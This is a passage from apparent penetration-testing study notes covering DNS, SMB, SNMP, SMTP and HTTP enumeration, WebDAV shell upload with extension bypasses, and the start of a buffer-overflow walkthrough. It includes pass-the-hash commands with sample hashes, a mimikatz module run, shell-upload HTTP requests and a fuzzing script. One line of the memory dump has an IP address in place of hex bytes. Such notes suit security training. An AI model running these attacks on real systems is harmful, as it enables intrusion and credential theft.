Contact details from whois results use recon/domains-vulnerabilities/xssed # Find xss vulnerabilities using xssed.com use recon/domains-hosts/google_site_web # Automatically find subdomains using Google search ``` # Active Information Gathering ## 4.1 DNS Enumeration ### Interacting with a DNS Server `host -t [type] [domain]` ```sh host -t ns conglomerate.com # dns nameservers host -t mx conglomerate.com # mailservers ``` ### Automating Lookups Forward Lookup `host [subdomain]` ```sh host www.conglomerate.com # get ip of www.conglomerate.com host idontexist.conglomerate.com # attempt to get ip of non existant subdomain ``` ### Forward Lookup Brute Force ```sh root@kali:~# echo www > list.txt root@kali:~# echo ftp >> list.txt root@kali:~# echo mail >> list.txt root@kali:~# echo owa >> list.txt root@kali:~# echo proxy >> list.txt root@kali:~# echo router >> list.txt root@kali:~# for ip in $(cat list.txt); do host $ip.conglomerate.com | grep 'has address'; done www.conglomerate.com has address 38.100.193.76 mail.conglomerate.com has address 38.100.193.84 router.conglomerate.com has address 38.100.193.71 ``` ### Reverse Lookup Brute Force `host [ip]` With a rough idea of the target's subnet range, perform a reverse lookup brute force. ```sh root@kali:~/Downloads# for ip in $(seq 1 254); do host 38.100.193.$ip | grep -v 'not found' | grep conglomerate.com; done 66.193.100.38.in-addr.arpa domain name pointer syslog.conglomerate.com. 69.193.100.38.in-addr.arpa domain name pointer beta.conglomerate.com. 70.193.100.38.in-addr.arpa domain name pointer ns1.conglomerate.com. 72.193.100.38.in-addr.arpa domain name pointer admin.conglomerate.com. 73.193.100.38.in-addr.arpa domain name pointer mail2.conglomerate.com. 76.193.100.38.in-addr.arpa domain name pointer www.conglomerate.com. 77.193.100.38.in-addr.arpa domain name pointer vpn.conglomerate.com. 80.193.100.38.in-addr.arpa domain name pointer ns2.conglomerate.com. 84.193.100.38.in-addr.arpa domain name pointer mail.conglomerate.com. 85.193.100.38.in-addr.arpa domain name pointer snmp.conglomerate.com. 89.193.100.38.in-addr.arpa domain name pointer siem.conglomerate.com. 90.193.100.38.in-addr.arpa domain name pointer ns3.conglomerate.com. 91.193.100.38.in-addr.arpa domain name pointer router.conglomerate.com. ``` ### DNS Zone Transfers If TCP port 53 is open, it may indicate that DNS zone transfers work. `host -l [domain] [nameserver]` or `host -t axfr [domain] [nameserver]` #### Failed Zone Transfer ```sh root@kali:~/Downloads# host -l conglomerate.com ns1.conglomerate.com Using domain server: Name: ns1.conglomerate.com Address: 38.100.193.70#53 Aliases: Host conglomerate.com not found: 5(REFUSED) ; Transfer failed. ``` #### Successful Zone Transfer ```sh root@kali:~/Downloads# host -l conglomerate.com ns2.conglomerate.com Using domain server: Name: ns2.conglomerate.com Address: 38.100.193.80#53 Aliases: conglomerate.com name server ns1.conglomerate.com. conglomerate.com name server ns2.conglomerate.com. conglomerate.com name server ns3.conglomerate.com. admin.conglomerate.com has address 38.100.193.83 beta.conglomerate.com has address 38.100.193.88 fs1.conglomerate.com has address 38.100.193.82 intranet.conglomerate.com has address 38.100.193.87 mail.conglomerate.com has address 38.100.193.84 mail2.conglomerate.com has address 38.100.193.73 ns1.conglomerate.com has address 38.100.193.70 ns2.conglomerate.com has address 38.100.193.80 ns3.conglomerate.com has address 38.100.193.90 router.conglomerate.com has address 38.100.193.71 siem.conglomerate.com has address 38.100.193.89 snmp.conglomerate.com has address 38.100.193.85 support.conglomerate.com has address 173.246.47.170 syslog.conglomerate.com has address 38.100.193.66 test.conglomerate.com has address 38.100.193.67 vpn.conglomerate.com has address 38.100.193.77 www.conglomerate.com has address 38.100.193.76 www2.conglomerate.com has address 38.100.193.79 ``` #### Automating Zone Transfers ```sh #!/bin/bash if [ -z "$1" ]; then echo "Usage: $0 [domain name]" exit 1 fi for server in $(host -t ns $1 | cut -d' ' -f4); do host -l $1 $server | grep 'has address' done ``` ### Relevant Tools in Kali #### 4.1.6.1 - `dnsrecon` * `dnsrecon -d conglomerate.com` * `dnsrecon -d conglomerate.com -t axfr` * `dnsrecon -r 38.100.193.0/24 | grep conglomerate.com` #### 4.1.6.1 - `dnsenum` * `dnsenum zonetransfer.me` ## Port Scanning ### TCP Connect / SYN Scanning #### 4.2.1.1 - Connect Scanning Relies on three-way/TCP handshake mechanism (syn, syn/ack, ack). Connect scan involves completing this handshake, if it is completed, port is open. ```sh nc -nvv -w 1.5 -z 10.0.0.19 3388-3390 (UNKNOWN) [10.0.0.19] 3390 (?) : Connection refused (UNKNOWN) [10.0.0.19] 3389 (?) open (UNKNOWN) [10.0.0.19] 3388 (?) : Connection refused sent 0, rcvd 0 ``` * `-n` - no reverse lookup * `-vv` - more verbose * `-w` - timeout * `-z` - zero IO mode, used for scanning #### 4.2.1.2 - "Stealth" SYN Scanning Send SYN packet without completing the TCP handshake (without sending final ack back). If a syn/ack is sent back, port is open. Early and primitive firewalls logged completed TCP sessions, making syn scanning bypass firewall logging. This is no longer true with modern firewalls, and the term "stealth" is misleading. Users might believe their scans will somehow not be detected, when in fact, they will be. #### UDP Scanning UDP stateless, no three-way handshake. If no reply is sent back, the UDP port is open. If it is closed, an ICMP port unreachable packet should be sent back. UDP scans is often unreliable, as firewalls may drop ICMP packets / not send back anything at all, leading to false positives, and you will regularly see UDP port scans showing all UDP ports open. People often forget to scan for UDP services, and stick only to TCP scanning, thereby seeing only half of the equation. ```sh nc -unvv -w 1.5 -z 192.168.1.23 160-165 (UNKNOWN) [192.168.1.23] 165 (?) : Connection refused (UNKNOWN) [192.168.1.23] 164 (cmip-agent) : Connection refused (UNKNOWN) [192.168.1.23] 163 (cmip-man) : Connection refused (UNKNOWN) [192.168.1.23] 162 (snmp-trap) : Connection refused (UNKNOWN) [192.168.1.23] 161 (snmp) open (UNKNOWN) [192.168.1.23] 160 (?) : Connection refused ``` ### Port Scanning with Nmap There is a list of nearly all ports, associated services, and probability of them being open found at `/usr/share/nmap/nmap-services`. Tabbing while a scan is in progress displays the progress. #### 4.2.4.1 - Accountability for Your Traffic Packet and byte counter using iptables ```sh #!/bin/bash # Reset counters and iptables rules iptables -Z && iptables -F # Measure incoming traffic from lab machine iptables -I INPUT 1 -s 192.168.1.23 -j ACCEPT # Measure outgoing traffic to lab machine iptables -I OUTPUT 1 -d 192.168.1.23 -j ACCEPT ``` `watch -n 1 iptables -nvL` #### 4.2.4.2 - Network Sweeping ##### Default Sweep `nmap -sn 192.168.1.0/24` or `nmap -sP 192.168.1.0/24` ##### Output Greppable `nmap -T4 -n -sn -oG - 192.168.1.0/24 | grep Up | cut -d' ' -f2` ##### Specific Port `nmap -T4 -n -sn -p 80 -oG - 192.168.1.0/24` ##### Aggressive Connect Scan on Top Ports `nmap -sT -A --top-ports=20 192.168.1.0/24 -oG -` ### OS Fingerprinting Based on the slight implementation differences of the TCP/IP stack (default TTL, TCP window size, etc.) within Operating Systems. `nmap -O 192.168.1.23` ### Banner Grabbing/Service Enumeration `nmap -sV -sT 192.168.1.23` An aggressive `-A` scan includes both `-sV`, `-O`, script scanning and traceroute: `nmap -A 192.168.1.23` ### Favourite Nmap Commands ```sh nmap -T4 -n -sC -sV -p- -oN nmap-versions --script='*vuln*' [ip] ``` #### `unicornscan` + `nmap` = `onetwopunch` Unicornscan supports asynchronous scans, speeding port scans on all 65535 ports. Nmap has powerful features that unicornscan does not have. With onetwopunch, unicornscan is used first to identify open ports, and then those ports are passed to nmap to perform further enumeration. ```sh ./onetwopunch.sh -t targets.txt -i tap0 -n '-T4 -n -sC -sV -oN nmap-versions --script=*vuln*' ``` Note, when using wildcards in nmap's NSE script parameter in onetwopunch, do not include quotes. ### Nmap Scripting Engine (NSE) Found within `/usr/share/nmap/scripts` Common services, SMB, SMTP, SNMP `nmap --script=[script] 192.168.1.23` ## SMB Enumeration ### Scanning for the NetBIOS Service SMB NetBIOS service listens on TCP ports 139 and 445, as well as several UDP ports. `nmap -p 139,445 --open -oG smb.txt 192.168.1.0/24` `nbtscan -r 192.168.1.0/24` ### Null Session Enumeration #### Vulnerable SMB Versions Vulnerable versions: * Windows NT, 2000, and XP (most SMB1) - VULNERABLE: Null Sessions can be created by default * Windows 2003, and XP SP2 onwards - NOT VULNERABLE: Null Sessions can't be created default * Most Samba (Unix) servers List of SMB versions and corresponding Windows versions: * SMB1 – Windows 2000, XP and Windows 2003. * SMB2 – Windows Vista SP1 and Windows 2008 * SMB2.1 – Windows 7 and Windows 2008 R2 * SMB3 – Windows 8 and Windows 2012. Empty LM and NTLM hashes: * Empty LM Hash: `aad3b435b51404eeaad3b435b51404ee` * Empty NT Hash: `31d6cfe0d16ae931b73c59d7e0c089c0` #### `rpcclient` Manually probe a SMB server ```sh $ rpcclient -U '' [ip] Password: rpcclient $> srvinfo # operating system version rpcclient $> netshareenumall # enumerate all shares and its paths rpcclient $> enumdomusers # enumerate usernames defined on the server rpcclient $> getdompwinfo # smb password policy configured on the server ``` Apparently the rpcclient version in OffSec VM does not work well with creating null sessions. A downgrade to samba-4.5.15 is required: https://forums.offensive-security.com/showthread.php?12943-Found-solution-to-enum4linux-rpcclient-problem-NT_STATUS_INVALID_PARAMETER&highlight=NT_STATUS_INVALID_PARAMETER Place the export commands into a script and source it before using rpcclient to use the downgraded version, or place it in bashrc. NOTE, once downgraded, pth-winexe doesn't seem to work. #### `enum4linux` Wrapper around smb programs like `rpcclient` to automate enumerating an SMB server. Produces tons of results when a null session is successful. NOTE: Make sure to downgrade rpcclient before using. ```sh enum4linux -a 192.168.1.23 enum4linux -u 'guest' -p '' -a 192.168.1.23 ``` #### `CrackMapExec` Works perfectly, list shares and permissions, enum users, disks, code execute and run modules like mimikatz. Hashes work. ```sh crackmapexec -u 'guest' -p '' --shares 192.168.1.23 crackmapexec -u 'guest' -p '' --rid-brute 4000 192.168.1.23 crackmapexec -u 'guest' -p '' --users 192.168.1.23 crackmapexec smb 192.168.1.0/24 -u Administrator -p P@ssw0rd crackmapexec smb 192.168.1.0/24 -u Administrator -H E52CAC67419A9A2238F10713B629B565:64F12CDDAA88057E06A81B54E73B949B crackmapexec -u Administrator -H E52CAC67419A9A2238F10713B629B565:64F12CDDAA88057E06A81B54E73B949B -M mimikatz 192.168.1.0/24 crackmapexec -u Administrator -H E52CAC67419A9A2238F10713B629B565:64F12CDDAA88057E06A81B54E73B949B -x whoami 192.168.1.23 crackmapexec -u Administrator -H E52CAC67419A9A2238F10713B629B565:64F12CDDAA88057E06A81B54E73B949B --exec-method smbexec -x whoami 192.168.1.23 # reliable pth code execution ``` #### `smbmap` Works well for listing and downloading files, and listing shares and permissions. Hashes work. Code execution don't work. ```sh smbmap -u '' -p '' -H 192.168.1.23 # similar to crackmapexec --shares smbmap -u guest -p '' -H 192.168.1.23 smbmap -u Administrator -p aad3b435b51404eeaad3b435b51404ee:e101cbd92f05790d1a202bf91274f2e7 -H 192.168.1.23 smbmap -u Administrator -p aad3b435b51404eeaad3b435b51404ee:e101cbd92f05790d1a202bf91274f2e7 -H 192.168.1.23 -r # list top level dir smbmap -u Administrator -p aad3b435b51404eeaad3b435b51404ee:e101cbd92f05790d1a202bf91274f2e7 -H 192.168.1.23 -R # list everything recursively smbmap -u Administrator -p aad3b435b51404eeaad3b435b51404ee:e101cbd92f05790d1a202bf91274f2e7 -H 192.168.1.23 -s wwwroot -R -A '.*' # download everything recursively in the wwwroot share to /usr/share/smbmap. great when smbclient doesnt work smbmap -u Administrator -p aad3b435b51404eeaad3b435b51404ee:e101cbd92f05790d1a202bf91274f2e7 -H 192.168.1.23 -x whoami # no work ``` #### `smbclient` Access SMB shares interactively, seems to work with anonymous access. Hashes don't work. ```sh smbclient //192.168.1.23/wwwroot smbclient //192.168.1.23/C$ WIN20082017 -U Administrator smbclient //192.168.1.23/C$ A433F6C2B0D8BB92D7288ECFFACFC7CD -U Administrator --pw-nt-hash # make sure to only use the NT portion of the hash ``` WARNNIG, be careful when using the `get` command to download absolute path files from the remote system. Eg. `get /etc/passwd` will download the passwd file and ovewrite YOUR `/etc/passwd`. Use `get /etc/passwd /tmp/passwd` instead. To download recursively: ``` # Within smbclient, download everything recursively: mask "" recurse ON prompt OFF cd 'path\to\remote\dir' lcd '~/path/to/download/to/' mget * ``` ##### pth-winexe Works great sometimes. Can open a windows cmd shell. ```sh pth-winexe -U administrator%WIN20082017 //192.168.1.23 cmd # using a plaintext password pth-winexe -U Administrator%A433F6C2B0D8BB92D7288ECFFACFC7CD //192.168.1.23 cmd # ntlm hash encrypted with https://www.browserling.com/tools/ntlm-hash pth-winexe -U domain/user%A433F6C2B0D8BB92D7288ECFFACFC7CD //192.168.1.23 cmd # domain user pth-winexe -U Administrator%8F49412C8D29DF02FB62879E33FBB745:A433F6C2B0D8BB92D7288ECFFACFC7CD //192.168.1.23 cmd # lm+ntlm hash encrypted with https://asecuritysite.com/encryption/lmhash pth-winexe -U Administrator%aad3b435b51404eeaad3b435b51404ee:A433F6C2B0D8BB92D7288ECFFACFC7CD //192.168.1.23 cmd # ntlm hash + empty lm hash # or export SMBHASH=aad3b435b51404eeaad3b435b51404ee:6F403D3166024568403A94C3A6561896 pth-winexe -U Administrator% //192.168.1.23 cmd ``` ##### psexec Metasploit `exploit/windows/smb/psexec` ##### xfreerdp Remote Desktop Protocol Before using `xfreerdp`'s `/pth` feature, you have to build and install latest version. Apparently updating and upgrading with `apt-get install freerdp-x11` only gets you `FreeRDP version 1.1.0-beta1`. The latest already 2+. Source and compilation guide: https://nullsec.us/rdp-sessions-with-xfreerdp-using-pth/ Still does not work after updating though. ```sh xfreerdp /u:testing /d:thinc /pth:31d6cfe0d16ae931b73c59d7e0c089c0 /v:192.168.1.23 ``` ### Nmap SMB NSE Scripts * List all smb nse scripts - `ls -la /usr/share/nmap/scripts/smb*` * Check smb and OS using nse script - `nmap -p 139,445 --script=smb-os-discovery 192.168.1.23` * Check certain smb vulnerability against all hosts - `nmap -iL hosts -Pn -p 139,445 --script=smb-vuln-ms08-067 --script-args=unsafe=1` * Enumerate smb usernames (similar to `enumdomusers` with `rpcclient`) - `nmap -p 139,445 --script=smb-enum-users [ip]` * Brute force smb creds - `nmap -p 139,445 --script=smb-brute [ip]` * Check many common smb vulnerabilities against a host - `nmap -p 139,445 --script=smb*-vuln* --script-args=unsafe=1 [ip]` Apparently if there are more than 10 hosts in the hosts input file, nmap won't scan them when using NSE. Nmap removed the `smb-check-vulns` script with individual scripts: https://forums.offensive-security.com/showthread.php?4008-04-3-3-Changes-to-quot-Nmap-NSE-Scripts-quot Vulscan is a NSE scripting module that enhances nmap and turns it into a vulnerability scanner: https://github.com/scipag/vulscan ## SMTP Enumeration Important commands include: * `VRFY` - Asks the server to verify an email address * `EXPN` - Asks the server for the membership of a mailing list Abuse these to verify existing users on a mail server. ```sh $ nc -C [ip] 25 # remember to use `-C` in `nc`! This will force nc to send a CRLF (`\r\n`) as line-ending. A normal `\n` will not work! Telnet will work by default. 220 dj.acme.local Microsoft ESMTP MAIL Service, Version: 5.0.2195.6713 ready at Mon, 19 Mar 2018 07:27:59 +0200 VRFY barry 250 2.1.5 <barry@barry> # user exists VRFY administrator 550 5.1.1 administrator... User unknown # user does not exist VRFY bob 252 2.1.5 Cannot VRFY user, but will take message for <[email protected]> # servers configured properly to not VRFY a user EXPN postmaster 250 2.1.5 root <root@barry> EXPN root 250 2.1.5 root <root@barry> ``` Use intel gathered from the passive information gathering stage to generate a users list to `VRFY` against the SMTP servers. Although, SMTP configurations allowing for this type of enumeration is uncommon, there are many services and protocols with overly verbose output messages, which at times, allow us to find out interesting information, such as whether a user exist in their system using bruteforce. Resources: * https://pentestlab.blog/tag/expn/ * A list of unix usernames: `/usr/share/metasploit-framework/data/wordlists/unix_users.txt`. ## SNMP Enumeration UDP Port 161 Simple Network Management Protocol. Based on UDP, susceptible to IP spoofing, and replay attacks. SNMP protocols 1, 2, and 2c offer no traffic encryption, meaning SNMP information and credentials can be easily intercepted over a local network. Traditional SNMP protocols also have weak authentication schemes, and are commonly left configured with default public and private community strings. ### MIB Tree SNMP Management Information Base * Branches - Organizations or network functions * Leaves - Final endpoints, specific variable values that can be probed ### Scanning for SNMP #### Finding SNMP services with `nmap` `nmap -sU -p 161 --open [ip]` #### Finding SNMP services with `onesixtyone` Common community strings: * `public` * `private` * `manager` ```sh echo public > community echo private >> community echo manager >> community for ip in $(seq 1 254); do echo 10.11.1.$ip; done > ips onesixtyone -c community -i ips ``` ### Windows SNMP Enumeration Example We can probe and query the SNMP service, with at least the read-only community string, in most cases, `public`. SNMP services offer a wealth of information. * `snmp-check -c public -v 1 [ip]` - Enumerate entire MIB tree, and outputs in a very friendly, human-readable manner * `snmpwalk -c public -v 1 [ip]` - Enumerate entire MIB tree * `snmpwalk -c public -v 1 [ip] [oid]` - Enumerate specific information MIB OIDs: * `1.3.6.1.2.1.25.1.6.0` - System Processes * `1.3.6.1.2.1.25.4.2.1.2` - Running Programs * `1.3.6.1.2.1.25.4.2.1.4` - Processes Path * `1.3.6.1.2.1.25.2.3.1.4` - Storage Units * `1.3.6.1.2.1.25.6.3.1.2` - Software Name * `1.3.6.1.4.1.77.1.2.25` - User Accounts * `1.3.6.1.2.1.6.13.1.3` - TCP Local Ports ## HTTP Enumeration ### Enumerating Web Server and Web Technology Versions ```sh curl -i [ip] # include response headers curl -I [ip] # show info only (using HEAD) curl -L [ip] # follow redirects ``` ### Directory Fuzzing #### `gobuster` ```sh gobuster -u http://website.com -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 100 | tee gobuster.log gobuster -u http://website.com -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 100 -c 'PHPSESSION=123' -x .php,.html | tee gobuster.log ``` #### `dirsearch` Great for websites that have extensions (eg. php). Added `wp` to dicc.txt ```sh ./dirsearch.py -u http://192.168.1.23 -e txt -t 50 # use dirsearch's default dict, which proved to be quite successful ./dirsearch.py -u http://192.168.1.23 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -e php -t 50 ``` ### `nikto` Web Scanner ```sh nikto -h 192.168.1.23 nikto -h 192.168.1.23 -Plugins outdated ``` A function within its code, "map_codes", seems to take forever to finish. Add a `return;` statement to line 228 of `/var/lib/nikto/plugins/nikto_core.plugin` to patch it. ### `wpscan` Wordpress Scanner ```sh wpscan -u example.com --enumerate p,t,u,tt # plugins, themes, usernames and timthumbs --log wpscanlog ``` Note, after installing either neovim or samba-4.5.15, wpscan stops working. ### WebDAV in IIS Servers 1. If you notice an IIS Server, scan for WebDAV using `nmap --script=http-webdav-scan,http-iis-webdav-vuln` (vuln checks for protected folders that can by bypassed) 2. Find unprotected/protected folders * If protected, bypass by: * Adding a `Translate: f` header * Inserting the characters `%c0%af` into any uri request longer than 1 character 3. Identify file types that can be uploaded and executed (accessed) with `davtest -cleanup -url http://url/folder` 4. Use msfvenom to generate and upload PHP (if PHP is available) or ASP shell using PUT request * If `.php` or `.asp` cannot be uploaded, upload it as an acceptable file type like `.txt` * Perform a COPY or MOVE request to rename the `.txt` back into `.php` or `.asp` * If that doesn't work, try using the semicolon bypass by renaming it to `shell.php;.txt` or `shell.asp;.txt` 5. Open a listener and access your shell by visiting your shell page or by using a GET request Generating Shell Payload * ASP Shell Msfvenom: http://web.archive.org/web/20171016091511/http://www.r00tsec.com:80/2011/09/exploiting-microsoft-iis-version-60.html Bypassing Protected Folders * https://blog.skullsecurity.org/2009/webdav-detection-vulnerability-checking-and-exploitation * https://secureyes.net/nw/assets/Bypassing-IIS-6-Access-Restrictions.pdf Bypassing Restricted File Type Uploads * WebDAV Upload Bypass with COPY: http://web.archive.org/web/20171016091511/http://www.r00tsec.com:80/2011/09/exploiting-microsoft-iis-version-60.html * Semicolon Vulnerability: https://soroush.secproject.com/blog/2009/12/microsoft-iis-semi-colon-vulnerability/ Other Resources: * Typical Full Flow: http://web.archive.org/web/20171016091511/http://www.r00tsec.com:80/2011/09/exploiting-microsoft-iis-version-60.html * WebDAV Metasploit Module Examples: http://carnal0wnage.attackresearch.com/2010/05/more-with-metasploit-and-webdav.html #### Ways to Interact with WebDAV Server 5 Methods to Upload to WebDAV * http://www.hackingarticles.in/5-ways-to-exploiting-put-vulnerability/ ##### `cadaver` ``` cadaver http://[ip]/[folder] put, copy, move, get, etc. ``` ##### WebDAV Interaction with BurpSuite Note: It is important to leave the whitespaces after the request, to let the server know that you have completed stating your request, just like in nc, otherwise the server will wait and hang. Retrieve properties of a resource ``` PROPFIND / HTTP/1.1 Host: 192.168.1.23 Content-Type: text/xml Content-Length: 147 Depth: 0 Translate: f <?xml version="1.0"?> <a:propfind xmlns:a="DAV:"> <a:prop><a:getcontenttype/></a:prop> <a:prop><a:getcontentlength/></a:prop> </a:propfind> ``` Directory listing ``` GET / HTTP/1.1 Host: 192.168.1.23 ``` Upload ASP shell with .txt extension to WebDAV using PUT ``` PUT /shell.txt HTTP/1.1 Host: 192.168.1.23 Content-Length: 38337 [ASP shellcode content here] ``` Move shell.txt to shell.asp;.txt ``` COPY /shell.txt HTTP/1.1 Host: 192.168.1.23 Destination: http://192.168.1.23/shell.asp%3b.txt ``` Execute shell.asp;.txt, make sure to open a nc listener on port 443 ``` GET /shell.asp%3b.txt HTTP/1.1 Host: 192.168.1.23 ``` ### CGI * Use `/usr/share/seclists/Discovery/Web_Content/cgis.txt` wordlist to find cgi pages. * `searchsploit apache cgi` * `nmap --script=http-shellshock --script-args uri=/cgi-bin/test.cgi --script-args uri=/cgi-bin/admin.cgi` ### PHP ```sh # PHP 5.5.9 search order, edit if necessary, eg. php version, windows?. searchsploit --colour -t php 5 | grep -v '/dos/\|/windows' | grep -iP '^(php|apache \+ php) (\d|<)' searchsploit --colour -t php 5.5 | grep -v '/dos/\|/windows' | grep -iP '^(php|apache \+ php) (\d|<)' searchsploit --colour -t php 5.x | grep -v '/dos/\|/windows' | grep -iP '^(php|apache \+ php) (\d|<)' ``` ### HTTP Enumeration Tips #### Wordlists * Dirsearch - ~/tools/dirsearch/db/dicc.txt * DirB - /usr/share/dirb/wordlists/ * wfuzz - /usr/share/wfuzz/wordlist/ * SecList - /usr/share/seclists/ * /usr/share/seclists/Discovery/Web_Content/ * /usr/share/seclists/Discovery/Web_Content/common.txt * /usr/share/seclists/Discovery/Web_Content/cgis.txt #### Hardcoded Links If a website has hardcoded links like "http://pinkdb.com" or "http://172.16.5.5", which you do not have access to, simply an entry like `[actual server ip] [hardcoded value]` (eg. `192.168.1.23 pinkydb.com`) to `/etc/hosts` #### Apache Directory Default Layouts https://wiki.apache.org/httpd/DistrosDefaultLayout#Debian.2C_Ubuntu_.28Apache_httpd_2.x.29 #### Host Header The host-Header tells the webserver which virtual host to use. Sometimes servers may behave differently when the host-header is changed from their IP to their hostname (example.com). #### Lookout For * Apache mod_x, as they may be vulnerable * WebDAV * CGI ## ident Enuemeration ### `ident-user-enum` Identify owners of processes ```sh ident-user-enum 192.168.1.23 22 113 139 445 ``` # Vulnerability Scanning ## Vulnerability Scanning with Nmap NSE scripts that scans for vulnerabilities are at `ls -l /usr/share/nmap/scripts/*vuln*`. * `nmap -p 80 --script=all 192.168.1.23` - Scan a target using all NSE scripts. May take an hour to complete. * `nmap -p 80 --script=*vuln* 192.168.1.23` - Scan a target using all NSE vuln scripts. * `nmap -p 80 --script=http*vuln* 192.168.1.23` - Scan a target using all HTTP vulns NSE scripts. * `nmap -p 21 --script=ftp-anon 192.168.1.0/24` - Scan entire network for FTP servers that allow anonymous access. * `nmap -p 80 --script=http-vuln-cve2010-2861 192.168.1.0/24` - Scan entire network for a directory traversal vulnerabilitiy. It can even retrieve admin's password hash. ## The OpenVAS Vulnerability Scanner ### OpenVAS Initial Setup `openvas-setup` Apparently, the program will fail. Thankfully, OpenVAS is already installed on the OffSec VM: https://forums.offensive-security.com/showthread.php?3216-05-2-1-Changes-to-quot-OpenVAS-Initial-Setup-quot-(openvas-setup)&p=12828#post12828 and https://forums.offensive-security.com/showthread.php?10139-OpenVas-Setup-issue&p=54721#post54721 Just run the following commands to get it up and running. ```sh openvasmd --user=admin --new-password=NEW_PASSWORD service redis-server start service greenbone-security-assistant start service openvas-scanner start service openvas-manager start firefox https://127.0.0.1:9392 ``` Add new target -> add new scan using target -> run # Buffer Overflows ## Fuzzing Fuzz base on buffer length and perhaps different characters, check for crashes, and observe memory stack in debugger. ```py #!/usr/bin/env python import socket string = 'A' for i in range(100, 10000, 200): print 'Fuzzing PASS with {} bytes'.format(i) s = socket.socket() s.connect(('192.168.1.23', 110)) s.recv(1024) s.send('USER test\r\n') s.recv(1024) s.send('PASS {}\r\n'.format(string * i)) s.send('QUIT\r\n') s.close() ``` # Win32 Buffer Overflows Stack overflow simulation ``` ESP -> 1000 .... \ 1001 .... |- # Current function 1002 .... | 1003 .... / EBP -> 1003 100A # Previous EBP further down 1004 3AFD # Return address to previous calling function 1005 .... 1006 .... ``` ``` ESP -> 1000 AAAA \ 1001 AAAA |- # Current function 1002 AAAA | 1003 AAAA / EBP -> 1003 AAAA # Previous EBP further down 1004 BBBB # Return address to previous calling function 1005 CCCC 1006 .... ``` ``` # Function completes, and starts cleaning up. # leave (mov esp, ebp) 1000 AAAA \ 1001 AAAA |- # Current function 1002 AAAA | 1003 AAAA / EB/SP->1003 AAAA # Previous EBP further down 1004 BBBB # Return address to previous calling function 1005 CCCC 1006 .... ``` ``` # leave (pop ebp) (ebp is now AAAA, and esp + 1) 1000 AAAA \ 1001 AAAA |- # Current function 1002 AAAA | 1003 AAAA / 1003 AAAA ESP -> 1004 BBBB # Return address to previous calling function 1005 CCCC 1006 .... ``` ``` # ret (pop eip) (eip is now BBBB, and esp + 1) 1000 AAAA 1001 AAAA 1002 AAAA 1003 AAAA 1004 BBBB # Return address to previous calling function, popped as EIP ESP -> 1005 CCCC 1006 .... ``` ``` # jmp esp ESP -> 1005 NOPS # nop sled to avoid shellcode from "stepping on its toes" while decoding 1006 NOPS 1007 CCCC # shellcode 1008 CCCC 1009 CCCC 100A CCCC ``` ## Crashing With fuzzing, see whether server crashes after a certain length buffer. * Fuzz * Check for crash ## Controlling EIP With a debugger like Immunity Debugger, see whether EIP is overwritten with your buffer. 1. Run vulnerable server 2. Open Immunity Debugger 3. Attach server process 4. Run 5. Send long buffer 6. In Immunity Debugger check whether EIP has been overwritten ## Find Offset 1. Use `/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l [length]` to create a cyclic pattern with the buffer length 2. Restart server and debugger 3. Send buffer 4. Record overwritten EIP 5. Use `/usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -q [eip value]` to find offset 6. Update buffer with new offset, and enter a custom value to overwrite EIP. 7. Pad the buffer to see how much more bytes you can fill in the stack after overwriting EIP. If the EIP does not get overwritten anymore, your buffer is too long, decrease the appended padding size. Anything above 500 bytes will be good to go, as most shellcode sizes are 300-500 bytes. ## Check for Bad Characters 1. Replace the appended padding with: ``` badchars = ( '\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10' '\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20' '\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30' '\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40' '\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50' '\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60' '\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70' '\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80' '\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90' '\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0' '\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0' '\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0' '\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0' '\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0' '\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0' '\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff') ``` 2. Restart server and debugger 3. Send buffer 4. Right click on ESP and follow in memory dump 5. Check whether any of the bytes are missing. A quick way is to look through the last column and see whether all the xF aligns ``` 01 02 03 04 05 06 07 08 09 0a 0b 0c 0d 0e 0f 192.168.1.23 14 15 16 17 18 19 1a 1b 1c 1d 1e 1f 20 21 22 23 24 25 26 27 28 29 2a 2b 2c 2d 2e 2f 30 31 32 33 34 35 36 37 38 39 3a 3b 3c 3d 3e 3f 40 41 42 43 44 45 46 47 48 49 4a 4b 4c 4d 4e 4f 50 51 52 53 54 55 56 57 58 59 5a 5b 5c 5d 5e 5f 60 61 62 63 64 65 66 67 68 69 6a 6b 6c 6d 6e 6f 70 71 72 73 74 75 76 77 78 79 7a 7b 7c 7d 7e 7f 80 81 82 83 84 85 86 87 88 89 8a 8b 8c 8d 8e 8f 90 91 92 93 94 95 96 97 98 99 9a 9b 9c 9d 9e 9f a0 a1 a2 a3 a4 a5 a6 a7 a8 a9 aa ab ac ad ae af b0 b1 b2 b3 b4 b5 b6 b7 b8 b9 ba bb bc bd be bf c0 c1 c2 c3 c4 c5 c6 c7 c8 c9 ca cb cc cd ce cf 